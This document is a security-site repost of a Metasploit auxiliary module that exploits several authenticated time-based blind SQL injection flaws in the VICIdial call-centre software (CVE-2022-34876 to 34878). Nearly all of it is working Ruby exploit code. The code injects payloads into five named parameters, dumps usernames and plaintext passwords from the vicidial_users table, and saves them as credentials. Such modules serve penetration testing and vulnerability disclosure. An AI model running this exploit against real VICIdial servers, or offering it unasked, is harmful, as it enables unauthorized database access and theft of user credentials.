VICIdial Multiple Authenticated SQL Injection
2024-9-4 05:2:0 Author: cxsecurity.com(查看原文) 阅读量:14 收藏

VICIdial Multiple Authenticated SQL Injection

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Exploit::SQLi def initialize(info = {}) super( update_info( info, 'Name' => 'VICIdial Multiple Authenticated SQLi', 'Description' => %q{ This module exploits several authenticated SQL Inject vulnerabilities in VICIdial 2.14b0.5 prior to svn/trunk revision 3555 (VICIBox 10.0.0, prior to January 20 is vulnerable). Injection point 1 is on vicidial/admin.php when adding a user, in the modify_email_accounts parameter. Injection point 2 is on vicidial/admin.php when adding a user, in the access_recordings parameter. Injection point 3 is on vicidial/admin.php when adding a user, in the agentcall_email parameter. Injection point 4 is on vicidial/AST_agent_time_sheet.php when adding a user, in the agent parameter. Injection point 5 is on vicidial/user_stats.php when adding a user, in the file_download parameter. VICIdial does not encrypt passwords by default. }, 'Author' => [ 'h00die' # msf module, discovery ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'https://www.vicidial.org/VICIDIALforum/viewtopic.php?f=4&t=41300&sid=aacb27a29fefd85265b4d55fe51122af'], [ 'CVE', '2022-34876'], # admin.php [ 'CVE', '2022-34877'], # AST_agent_time_sheet.php [ 'CVE', '2022-34878'] # user_stats.php ], 'Actions' => [ ['List Users - modify_email_accounts method', { 'Description' => 'Queries username, password for COUNT users' }], ['List Users - access_recordings method', { 'Description' => 'Queries username, password for COUNT users' }], ['List Users - agentcall_email method', { 'Description' => 'Queries username, password for COUNT users' }], ['List Users - agent_time_sheet method', { 'Description' => 'Queries username, password for COUNT users' }], ['List Users - user_stats method', { 'Description' => 'Queries username, password for COUNT users' }], ], 'DefaultAction' => 'List Users', 'DisclosureDate' => '2022-04-19', 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [IOC_IN_LOGS], 'Reliability' => [] } ) ) register_options [ OptInt.new('COUNT', [false, 'Number of users to enumerate', 3]), OptString.new('USERNAME', [true, 'Valid Username for login', '6666']), OptString.new('PASSWORD', [true, 'Valid Password for login', '']), OptString.new('ACTION', [true, 'Valid Password for login', 'List Users - access_recordings method']) ] end def post_4a { 'ADD' => '4A', 'custom_fields_modify' => '0', 'user' => '111', 'pass' => '111', 'force_change_password' => 'N', 'full_name' => '111', 'user_level' => '1', 'user_group' => 'ADMIN', 'phone_login' => '111', 'phone_pass' => '111', 'active' => 'Y', 'voicemail_id' => '', 'email' => '', 'mobile_number' => '', 'user_code' => '', 'user_location' => '', 'territory' => '', 'user_nickname' => '', 'user_new_lead_limit' => '-1', 'agent_choose_ingroups' => '1', 'agent_choose_blended' => '1', 'hotkeys_active' => '0', 'scheduled_callbacks' => '1', 'agentonly_callbacks' => '0', 'next_dial_my_callbacks' => 'NOT_ACTIVE', 'agentcall_manual' => '0', 'manual_dial_filter' => 'DISABLED', 'agentcall_email' => '0', 'agentcall_chat' => '0', 'vicidial_recording' => '1', 'vicidial_transfers' => '1', 'closer_default_blended' => '0', 'user_choose_language' => '0', 'selected_language' => 'defaultEnglish', 'vicidial_recording_override' => 'DISABLED', 'mute_recordings' => 'DISABLED', 'alter_custdata_override' => 'NOT_ACTIVE', 'alter_custphone_override' => 'NOT_ACTIVE', 'agent_shift_enforcement_override' => 'DISABLED', 'agent_call_log_view_override' => 'DISABLED', 'hide_call_log_info' => 'DISABLED', 'agent_lead_search' => 'NOT_ACTIVE', 'lead_filter_id' => 'NONE', 'user_hide_realtime' => '0', 'allow_alerts' => '0', 'preset_contact_search' => 'NOT_ACTIVE', 'max_inbound_calls' => '0', 'max_inbound_filter_enabled' => '0', 'max_inbound_filter_min_sec' => '-1', 'max_hopper_calls' => '0', 'max_hopper_calls_hour' => '0', 'wrapup_seconds_override' => '-1', 'ready_max_logout' => '-1', 'status_group_id' => '', 'custom_one' => '', 'custom_two' => '', 'custom_three' => '', 'custom_four' => '', 'custom_five' => '', 'qc_enabled' => '0', 'qc_user_level' => '1', 'qc_pass' => '0', 'qc_finish' => '0', 'qc_commit' => '0', 'realtime_block_user_info' => '0', 'admin_hide_lead_data' => '0', 'admin_hide_phone_data' => '0', 'ignore_group_on_search' => '0', 'user_admin_redirect_url' => '', 'view_reports' => '0', 'access_recordings' => '0', 'alter_agent_interface_options' => '0', 'modify_users' => '0', 'change_agent_campaign' => '0', 'delete_users' => '0', 'modify_usergroups' => '0', 'delete_user_groups' => '0', 'modify_lists' => '0', 'delete_lists' => '0', 'load_leads' => '0', 'modify_leads' => '0', 'export_gdpr_leads' => '0', 'download_lists' => '0', 'export_reports' => '0', 'delete_from_dnc' => '0', 'modify_campaigns' => '0', 'campaign_detail' => '0', 'delete_campaigns' => '0', 'modify_ingroups' => '0', 'delete_ingroups' => '0', 'modify_inbound_dids' => '0', 'delete_inbound_dids' => '0', 'modify_custom_dialplans' => '0', 'modify_remoteagents' => '0', 'delete_remote_agents' => '0', 'modify_scripts' => '0', 'delete_scripts' => '0', 'modify_filters' => '0', 'delete_filters' => '0', 'ast_admin_access' => '0', 'ast_delete_phones' => '0', 'modify_call_times' => '0', 'delete_call_times' => '0', 'modify_servers' => '0', 'modify_shifts' => '0', 'modify_phones' => '0', 'modify_carriers' => '0', 'modify_email_accounts' => '0', 'vKik' => 'vKik', 'modify_labels' => '0', 'modify_colors' => '0', 'modify_languages' => '0', 'modify_statuses' => '0', 'modify_voicemail' => '0', 'modify_audiostore' => '0', 'modify_moh' => '0', 'modify_tts' => '0', 'modify_contacts' => '0', 'callcard_admin' => '0', 'modify_auto_reports' => '0', 'add_timeclock_log' => '0', 'modify_timeclock_log' => '0', 'delete_timeclock_log' => '0', 'manager_shift_enforcement_override' => '0', 'pause_code_approval' => '0', 'admin_cf_show_hidden' => '0', 'modify_ip_lists' => '0', 'ignore_ip_list' => '0', 'two_factor_override' => 'NOT_ACTIVE', 'vdc_agent_api_access' => '0', 'api_list_restrict' => '0', 'api_allowed_functions[]' => 'ALL_FUNCTIONS', 'api_only_user' => '0', 'modify_same_user_level' => '1', 'alter_admin_interface_options' => '1', 'SUBMIT' => 'SUBMIT' } end def basic_auth user_pass = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}" { 'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}" } end def inject_admin_page(param, payload) data = post_4a d = Rex::Text.rand_text_numeric(4) data[param] = "0' AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND '#{d}'='#{d}" res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'vicidial', 'admin.php'), 'headers' => basic_auth, 'vars_post' => data }) fail_with Failure::Unreachable, 'Connection failed' unless res end def run_host(ip) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'vicidial', 'admin.php'), 'headers' => basic_auth }) fail_with(Failure::Unreachable, 'Failed to load website') unless res fail_with(Failure::NoAccess, 'Invalid login/password') if res.code == 401 @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true }) do |payload| d = Rex::Text.rand_text_numeric(4) if datastore['ACTION'] == 'List Users - modify_email_accounts method' inject_admin_page('modify_email_accounts', payload) elsif datastore['ACTION'] == 'List Users - access_recordings method' inject_admin_page('access_recordings', payload) elsif datastore['ACTION'] == 'List Users - agentcall_email method' inject_admin_page('agentcall_email', payload) elsif datastore['ACTION'] == 'List Users - agent_time_sheet method' res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'vicidial', 'AST_agent_time_sheet.php'), 'headers' => basic_auth, 'vars_get' => { 'agent' => "0' AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND '#{d}'='#{d}" } }) elsif datastore['ACTION'] == 'List Users - user_stats method' res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'vicidial', 'user_stats.php'), 'headers' => basic_auth, 'vars_get' => { 'DB' => '', 'pause_code_rpt' => '', 'park_rpt' => '1', 'did_id' => '', 'did' => '', 'begin_date' => Date.today.to_s, 'end_date' => Date.today.to_s, 'user' => '', 'submit' => 'submit', 'search_archived_data' => '', 'NVAuser' => '', 'file_download' => "1' AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND '#{d}'='#{d}" } }) end end unless @sqli.test_vulnerable print_bad("#{peer} - Testing of SQLi failed. If this is time based, try increasing SqliDelay.") return end columns = ['user', 'pass'] print_status('Enumerating Usernames and Password Hashes') data = @sqli.dump_table_fields('vicidial_users', columns, '', datastore['COUNT']) table = Rex::Text::Table.new('Header' => 'vicidial_users', 'Indent' => 1, 'Columns' => columns) data.each do |user| create_credential({ workspace_id: myworkspace_id, origin_type: :service, module_fullname: fullname, username: user[0], private_type: :password, private_data: user[1], service_name: 'VICIdial', address: ip, port: datastore['RPORT'], protocol: 'tcp', status: Metasploit::Model::Login::Status::UNTRIED }) table << user end print_good('Dumped table contents:') print_line(table.to_s) end end



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2024090011
如有侵权请联系:admin#unsafe.sh